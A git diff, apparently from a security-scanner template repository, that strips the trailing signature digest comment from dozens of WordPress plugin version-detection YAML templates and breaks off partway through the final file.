a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 145ce68373..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206eaa2bec04165e2c2039b55848d220cd07a03807c1aa2e5114fad5a8f35298e902201360e826919d174a76270ab20d94674c82d24c4d37450bd785eb6f510d54b4db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b3ec16caed..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100db335f79bf73511102ca6db506f329bdf662aa433b4edf1172345811e47baa0202207007bf40af0754aa1eabc9a1762d8bea129a58be31f31529d4af41db18c4837f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 1be5e13c7e..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f6e413416c598d3e5a8551d4da6b2cd4a5634666d6f40edd9855b42b028927e0022100c3f7bd6d45aab5092c46e424a18c8c521b548d3dca3327b20f53f19a87465280:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 044822deb3..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100882a6511eb04bfbe8f7574cb45051da1bbb4b4b94acb9fac82e551dd48e27f7a022100c5fe4340ff180e462304763854c7c47073449b8a0c8c7b322939aa8d5ba31c76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 96322cc025..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032e1f106796818eaab26de584c7444f97ea2e648ab10685047cca1d4c1f00c77022053c5dba53b36c000d772828405e961d68181cfd94b397cc04adca2856cd4ade6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index e341a35c79..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b9b16425abbde2aee8de64a5f17c1432c965ee6c15ea125a0b6ec58e465d97d00221008334935cd4e81bc80731d9c7d99e73a0d4372f14d90466795135b90686079850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1c708cbcd5..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066317753531605268a6d9d7f98f488a53e0c396fd8e12d67dffcf73e0b57c5af022074a32d932de755336aaa905afdff1131604f915fe5a43f809cff296302d8b4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 25694b165f..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220670d9c1b517c35d04c29a63bf1ac0086f098f35c666d92a0a260be1bab486dae022032beaba7e4bbce10cf56cb81b460b29f4e2d66f2b860971515efdb0cecf34ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 162d5c4479..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b8900d9a1f6b22434c27f43a5d6f00327f130b16a013a0c29d1cce908e87e59022100c74056d124b3194544868db8273f8ebb5e00fd5d7bd7ac479281317c722075f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index ed499c2f06..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef772085bb281879eee2d3c4b12de6f0c8755d55d9e3826e89843ac3173d428c0221009d1ead4524bef4596336b8c6575719c0c91c08d949aad750b64d6990b5b4ba09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index d1ec82d709..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022012c9796f40b8aba09086eec6d4221d9d3b4c1f0cbeb8d95351e52cbde15dd3a5022100b54516a16a5a70f942e597c7b83431610a78574576e51e6da19ce86de091ad7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 54a4d28f42..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf19c0bddd8f9eeb1d0a4f13f60cd32b44f400eef8983f6d81b03b45a05753a902203c4d1823c972911526814400e010a7c1a0f1e4a5d725923db4538e310758167f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 6127d033c3..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca4fcaf2ca29499cb2742c9f74d7ed2be490bc6eb27e02569553c572208459e30220525a310a4e92abcb33ac4c86ef9bb0342031d60f44a7c7e67909b408bece875b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 40588f2daf..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dd5a12abf2ef32b4be59ea2e6786251b1522722a8df32c5c8495fb287d5f480702200bee287365d6cb79600f686c58474c584eb2351fa362df6c3dfddfa41fc26fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 97c4bef856..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210086ce1daa8cc7839f566d1b7139847dea33da144bb319699f7c59b800bb5f292a022038ea16efb1a28787aaf5181e7c69dffc9441e2f335ad177db4db5651119b63ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index f204fe0946..97b7306b75 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220743c89b30616463bcf86935a9de79f20845c7019d53186ae4bd81159040cdc690220286bc897812176a9f48f385d6139014bf324196b6307579f149a7f40c9ce51f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index a9c14057be..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022002c40a8aa55ad96ef364bc93b7bd332fb3de877a1dbbf738733d24cd3247daa302210088772e7997429224cf8ec07a4ff5d5ac9c59e5c1802a7600cbe859c20c99a11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index e557cb2697..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f85a4b2115334ef889acbca00448f27db418b08459512cea5afd5a38a2ebd958022022c2b52ed1e1dd43cc810980afac6c00727e96425143c6341627c5997febd34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 1bad84ebc7..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009193a3460e9f9c1cb8335b2baf4a46af0dc191fde3c10a4f65eaa04ca17aa21e02207ab14c82fc6dfd82d53647ad60dbceba608fd62419ba88b34ef8a194aef734b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 0b65539968..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206adb952b37d3724301bd425b215b0696889bd9ad751dd61a4897f6de0c975761022100e2f3acb61df83e4b3bf35e263abe312d7af2bfb5dbabf31c5411c9f7c55287df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index d6c1eece7d..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205d755e2b4f7816b15b743fe07d636a480d7134a0fff1f0230f4a59f367abf8f2022100e2a772d18f3b1505e81c88c4a8836059d6f3943e60df49d7c4f3d6eef7914090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index a38e0356ca..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203bb6ed7128a82c4fb0ef6037a701d5cd2e8c1bc31e6d5a4e59ad421f68168383022100e49ae1145691104bc18dc32182171ab6d478fdc315d776e2fcc1016563befda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index b4c1cee5a3..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eb72b4ab9be95c5b34790189ae31d5b5e2731b728040918ee8625ba879ac306e022037393f96ab924ae6d820169f8db7758447d20e631c4bf82bbf6a8b30720c6f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 7427238590..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207ac2db1e048c692da64f6e7e3d49103b2e5bb04aa7a526852873de0952b5e118022100829c0ba9f206cc42d0548d72cfb0826ebc19b0fb72993cddce527f6213556699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index b0fc961037..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204353be9b511f0474990b0e63a77e203774eb406a9e0cfaed34dcdc3fb91b9bdb02203e8304cbdcf8803662dc89a8e6f32b652860dbf1d35f956d0de9a8ac2cdf0206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index b0c6c9ff6d..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a08a378300fa22d785d26dbb44e73941e4c91d7480db66e22cbdcd4a74a831702200aaca7370ef71cb3e4fea63549afc3f5085aa1f0c1509b41850d6fe5f869184c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1a714dd4af..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022012187bb25df388f6dc551543f9c0215753121389cd84d6708c0d0480abbc36c702205a4e99dd7b1a26eac7e1dc76e09cd81b4e6d83b996238c856bedd4ba55a8c9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 83521b5fa4..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c9d5f97f1a19d3d49dd8deb348757564747320c9de7cf60755c154a82e5c1237022100b0f8265bd442719bb62650b8e85f76137bc56ddc490bb91967d021d86b7d22d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 1f63ef73ab..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202e745276be7467cee6126c2736b3b7e521f6f088a5868e9a2c564c377782eb950220441adb1dde8c721a6fd0d4e7151fabb4db0eb9eb37d51e43b130a296e9460a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 493fff62c7..b6f392efba 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220041b975c847859b68ee8ab300df1c015cf037bb93ad7a65855582b058ef34e1a02210080289a485c7a3d5608c8bd54bbe6f28b38f0ccd83585d155a593f9a8675c92e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 28470db5ed..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8a1da741bc1cb086588a1b00de37b5df6ad8a8cf92af512cd72dbcd55124595022010e1a4671b705af5e0077398585fc801742c9e971e3b6f9fcede0b5c10015a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 67173ce634..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a90eea64eecf5bb9c9cad4750e1b77879a701e4a2cb94c41aa6350ecb981ff6002205af12ad8ef0de06af6c9366a4da63cbd5dd51792de3253b7858eb034c1811ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index bef6daf987..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009491f26065b4e56ee6fd646c449c2ecf4651b3748318172bd465dd1a5d7dc3c202210091e90b55ae33209c4fddda4c348331c3831529b28549f24cdb265ac48031870c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 3d8ff553a3..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200d450cf83c7f28b8326e1cce9887bb955aee3fa5efd0b91c57e2c3a6872d38d60221008723563c3a03e7f15cea00f893db225bc21cdd6cc98d43d5470527c04973d813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index eab6f405ef..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cfdd05e3c13089e9f54bb263b697487cd73a46ee320c5a24fa6078e67dc6f1a2022100fe9a02d84a4fc53e022fd7e2f60c5586b4b3ad26ac350c000f475cc22188cb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index d5c40793b1..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e800abf11cfec4ae4a15effa347037893795bfc572ce18ffb7a5f6ef724240802203ddb71b7c8f155f7844711085d8c5e8826949993fabf1a082103786bd55d1e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index aad628a97d..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100883155b4a8d09bd01519542e9c4c4f225972ab3ef42afea4059ed0be5b49757902200f279fb96b957a89f18d10a153391a02c2f06236987d1e0ef4480e566a9759be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index a7f26ad472..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0b111f25c23c34b66d79b2582ebd48c5dd171048c03978f5600e33ff3f7a982022056634c159d2ea4d04a7dfb2ba8429568d355a1801f6089d7fcdc1cb4bf58f11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 3157f6910d..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cab13fd9f04437554dcd20bbe7ea53016a808cbffc2f5568e763a543f14a986d02203e788913cc22ffa57869d3eeb01c9babbec18483b852dead8f397ead8fe4a475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 99d1ec63c0..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100de3d7aa407570a3cad535dd73619392560444eb741c981b83a37104363785991022100c47689692866dec550e8a09a1a628c489806c6cfe51d1072c0252a8b64fa55db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index dcdc14882a..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c30f714a179c944588bdbad9c9e34dbc2afd825389cf3022f4edf4f664e1ca70221008df3cb280a2b4afbf6eeed5f016b5687d7609025b562a31526decdf285ca09e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index c5beba9e56..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200bbf81896e8ff4f7bbb5a0835567bf2dc4aa7ccd575f96415f0eaa907f189fbc0220163a2c1818ec6100fbb0d2728922ed161ccd95eee11681a3bd8104fb47af9cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 5ba984bab8..61a793edf7 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203bf0ad2b21a6cf5170019aa9faf086ab2f6b85ffebec0ce8bd9876f3a325f826022100d1f7299e5ab2b1bd568b64ba757f5aabf236591062ba32205c534411e4d7ac9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index aae3dc8e8c..0da88d5d3f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207d79d9c6f8e047ea9b670e5681b6984ecc3d704c4844d5bd72add8c1d9e4a31e022100ff48efb22055e27c177441a1b59838176885d722ddd9c5b4634c5f843f9eb2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index df86284171..2b29428cf1 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100980a96bf92b39e4fa417d9aa94ce4ee084aace6afea5ea1b075947e48fa9e75f022015c456f3d011cb7380a9d633ac11378b97767cf926369ea09502310595a6af53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 9466778c4e..181e619a7c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203152400e990da5ef86c600fb9df545686481906dbff34603303cd7caba05a6ed02201547d5f499f8ff5f083659982fb145b12c759d9990fb2f1ce468e04777509c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index dba43fc1e8..8164eb4483 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0bda84216e687a9365e0c8f853b030c47bbff103894473238f0cb3242acb4c50220651153bcb89f24faef9db74ed6ba2f688c69851968ab602df3c15307dda18301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index faae80f706..59554defdf 100644 --- 